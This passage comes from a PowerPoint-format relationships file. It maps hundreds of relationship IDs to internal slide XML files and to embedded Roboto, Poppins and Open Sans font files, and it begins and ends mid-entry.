Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide788.xml"/><Relationship Id="rId551" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide545.xml"/><Relationship Id="rId793" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide787.xml"/><Relationship Id="rId297" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide291.xml"/><Relationship Id="rId296" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide290.xml"/><Relationship Id="rId295" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide289.xml"/><Relationship Id="rId294" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide288.xml"/><Relationship Id="rId299" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide293.xml"/><Relationship Id="rId298" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide292.xml"/><Relationship Id="rId271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide265.xml"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide264.xml"/><Relationship Id="rId269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide263.xml"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide258.xml"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide257.xml"/><Relationship Id="rId262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide256.xml"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide255.xml"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide262.xml"/><Relationship Id="rId267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide261.xml"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide260.xml"/><Relationship Id="rId265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide259.xml"/><Relationship Id="rId260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide254.xml"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide253.xml"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide252.xml"/><Relationship Id="rId253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide247.xml"/><Relationship Id="rId495" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide489.xml"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide246.xml"/><Relationship Id="rId494" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide488.xml"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide245.xml"/><Relationship Id="rId493" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide487.xml"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide244.xml"/><Relationship Id="rId492" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide486.xml"/><Relationship Id="rId257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide251.xml"/><Relationship Id="rId499" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide493.xml"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide250.xml"/><Relationship Id="rId498" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide492.xml"/><Relationship Id="rId255" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide249.xml"/><Relationship Id="rId497" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide491.xml"/><Relationship Id="rId254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide248.xml"/><Relationship Id="rId496" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide490.xml"/><Relationship Id="rId293" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide287.xml"/><Relationship Id="rId292" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide286.xml"/><Relationship Id="rId291" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide285.xml"/><Relationship Id="rId290" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide284.xml"/><Relationship Id="rId286" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide280.xml"/><Relationship Id="rId285" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide279.xml"/><Relationship Id="rId284" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide278.xml"/><Relationship Id="rId283" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide277.xml"/><Relationship Id="rId289" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide283.xml"/><Relationship Id="rId288" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide282.xml"/><Relationship Id="rId287" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide281.xml"/><Relationship Id="rId282" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide276.xml"/><Relationship Id="rId281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide275.xml"/><Relationship Id="rId280" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide274.xml"/><Relationship Id="rId275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide269.xml"/><Relationship Id="rId274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide268.xml"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide267.xml"/><Relationship Id="rId272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide266.xml"/><Relationship Id="rId279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide273.xml"/><Relationship Id="rId278" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide272.xml"/><Relationship Id="rId277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide271.xml"/><Relationship Id="rId276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide270.xml"/><Relationship Id="rId629" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide623.xml"/><Relationship Id="rId624" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide618.xml"/><Relationship Id="rId623" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide617.xml"/><Relationship Id="rId622" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide616.xml"/><Relationship Id="rId621" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide615.xml"/><Relationship Id="rId628" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide622.xml"/><Relationship Id="rId627" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide621.xml"/><Relationship Id="rId626" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide620.xml"/><Relationship Id="rId625" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide619.xml"/><Relationship Id="rId620" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide614.xml"/><Relationship Id="rId619" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide613.xml"/><Relationship Id="rId618" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide612.xml"/><Relationship Id="rId613" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide607.xml"/><Relationship Id="rId612" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide606.xml"/><Relationship Id="rId611" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide605.xml"/><Relationship Id="rId610" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide604.xml"/><Relationship Id="rId617" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide611.xml"/><Relationship Id="rId616" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide610.xml"/><Relationship Id="rId615" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide609.xml"/><Relationship Id="rId614" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide608.xml"/><Relationship Id="rId409" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide403.xml"/><Relationship Id="rId404" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide398.xml"/><Relationship Id="rId646" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide640.xml"/><Relationship Id="rId403" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide397.xml"/><Relationship Id="rId645" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide639.xml"/><Relationship Id="rId402" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide396.xml"/><Relationship Id="rId644" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide638.xml"/><Relationship Id="rId401" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide395.xml"/><Relationship Id="rId643" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide637.xml"/><Relationship Id="rId408" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide402.xml"/><Relationship Id="rId407" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide401.xml"/><Relationship Id="rId649" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide643.xml"/><Relationship Id="rId406" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide400.xml"/><Relationship Id="rId648" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide642.xml"/><Relationship Id="rId405" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide399.xml"/><Relationship Id="rId647" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide641.xml"/><Relationship Id="rId400" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide394.xml"/><Relationship Id="rId642" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide636.xml"/><Relationship Id="rId641" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide635.xml"/><Relationship Id="rId640" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide634.xml"/><Relationship Id="rId635" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide629.xml"/><Relationship Id="rId634" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide628.xml"/><Relationship Id="rId633" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide627.xml"/><Relationship Id="rId632" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide626.xml"/><Relationship Id="rId639" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide633.xml"/><Relationship Id="rId638" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide632.xml"/><Relationship Id="rId637" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide631.xml"/><Relationship Id="rId636" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide630.xml"/><Relationship Id="rId631" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide625.xml"/><Relationship Id="rId630" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide624.xml"/><Relationship Id="rId829" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-boldItalic.fntdata"/><Relationship Id="rId828" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-italic.fntdata"/><Relationship Id="rId827" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-bold.fntdata"/><Relationship Id="rId822" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-regular.fntdata"/><Relationship Id="rId821" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Poppins-boldItalic.fntdata"/><Relationship Id="rId820" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Poppins-italic.fntdata"/><Relationship Id="rId826" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-regular.fntdata"/><Relationship Id="rId825" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-boldItalic.fntdata"/><Relationship Id="rId824" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-italic.fntdata"/><Relationship Id="rId823" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-bold.fntdata"/><Relationship Id="rId819" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Poppins-bold.fntdata"/><Relationship Id="rId818" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Poppins-regular.fntdata"/><Relationship Id="rId817" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-boldItalic.fntdata"/><Relationship Id="rId816" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-italic.fntdata"/><Relationship Id="rId811" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto-bold.fntdata"/><Relationship Id="rId810" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto-regular.fntdata"/><Relationship Id="rId815" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-bold.fntdata"/><Relationship Id="rId814" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-regular.fntdata"/><Relationship Id="rId813" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto-boldItalic.fntdata"/><Relationship Id="rId812" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto-italic.fntdata"/><Relationship Id="rId609" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide603.xml"/><Relationship Id="rId608" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide602.xml"/><Relationship Id="rId607" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide601.xml"/><Relationship Id="rId602" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide596.xml"/><Relationship Id="rId601" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide595.xml"/><Relationship Id="rId600" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide594.xml"/><Relationship Id="rId606" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide600.xml"/><Relationship Id="rId605" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide599.xml"/><Relationship Id="rId604" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide598.xml"/><Relationship Id="rId603" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide597.xml"/><Relationship Id="rId833" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/OpenSans-boldItalic.fntdata"/><Relationship Id="rId832" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/OpenSans-italic.fntdata"/><Relationship Id="rId831" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/OpenSans-bold.fntdata"/><Relationship Id="rId830" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/OpenSans-regular.fntdata"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide222.xml"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide221.xml"/><Relationship Id="rId469" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide463.xml"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide220.xml"/><Relationship Id="rId468" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide462.xml"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide219.xml"/><Relationship Id="rId467" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide461.xml"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide223.xml"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide214.xml"/><Relationship Id="rId462" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide456.xml"/><Relationship Id="rId461" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide455.xml"/><Relationship Id="rId460" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide454.xml"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide218.xml"/><Relationship Id="rId466" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide460.xml"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide217.xml"/><Relationship Id="rId465" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide459.xml"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide216.xml"/><Relationship Id="rId464" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide458.xml"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide215.xml"/><Relationship Id="rId463" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide457.xml"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide211.xml"/><Relationship Id="rId459" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide453.xml"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide210.xml"/><Relationship Id="rId458" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide452.xml"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide209.xml"/><Relationship Id="rId457" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide451.xml"/><Relationship Id="rId699" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide693.xml"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide208.xml"/><Relationship Id="rId456" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide450.xml"/><Relationship Id="rId698" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide692.xml"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide213.xml"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide212.xml"/><Relationship Id="rId451" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide445.xml"/><Relationship Id="rId693" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide687.xml"/><Relationship Id="rId450" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide444.xml"/><Relationship Id="rId692" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide686.xml"/><Relationship Id="rId691" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide685.xml"/><Relationship Id="rId690" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide684.xml"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide207.xml"/><Relationship Id="rId455" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide449.xml"/><Relationship Id="rId697" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide691.xml"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide206.xml"/><Relationship Id="rId454" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide448.xml"/><Relationship Id="rId696" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide690.xml"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide205.xml"/><Relationship Id="rId453" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide447.xml"/><Relationship Id="rId695" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide689.xml"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide204.xml"/><Relationship Id="rId452" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide446.xml"/><Relationship Id="rId694" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide688.xml"/><Relationship Id="rId491" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide485.xml"/><Relationship Id="rId490" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide484.xml"/><Relationship Id="rId249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide243.xml"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide242.xml"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide241.xml"/><Relationship Id="rId489" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide483.xml"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide236.xml"/><Relationship Id="rId484" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide478.xml"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide235.xml"/><Relationship Id="rId483" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide477.xml"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide234.xml"/><Relationship Id="rId482" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide476.xml"/><Relationship Id="rId481" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide475.xml"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide240.xml"/><Relationship Id="rId488" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide482.xml"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide239.xml"/><Relationship Id="rId487" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide481.xml"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide238.xml"/><Relationship Id="rId486" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide480.xml"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide237.xml"/><Relationship Id="rId485" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide479.xml"/><Relationship Id="rId480" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide474.xml"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide233.xml"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide232.xml"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide231.xml"/><Relationship Id="rId479" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide473.xml"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide230.xml"/><Relationship Id="rId478" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide472.xml"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide225.xml"/><Relationship Id="rId473" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide467.xml"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide224.xml"/><Relationship Id="rId472" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide466.xml"/><Relationship Id="rId471" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide465.xml"/><Relationship Id="rId470" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide464.xml"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide229.xml"/><Relationship Id="rId477" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide471.xml"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide228.xml"/><Relationship Id="rId476" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide470.xml"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide227.xml"/><Relationship Id="rId475" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide469.xml"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide226.xml"/><Relationship Id="rId474" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide468.xml"/><Relationship Id="rId426" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide420.xml"/><Relationship Id="rId668" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide662.xml"/><Relationship Id="rId425" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide419.xml"/><Relationship Id="rId667" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide661.xml"/><Relationship Id="rId424" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide418.xml"/><Relationship Id="rId666" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide660.xml"/><Relationship Id="rId423" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide417.xml"/><Relationship Id="rId665" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide659.xml"/><Relationship Id="rId429" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide423.xml"/><Relationship Id="rId428" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" 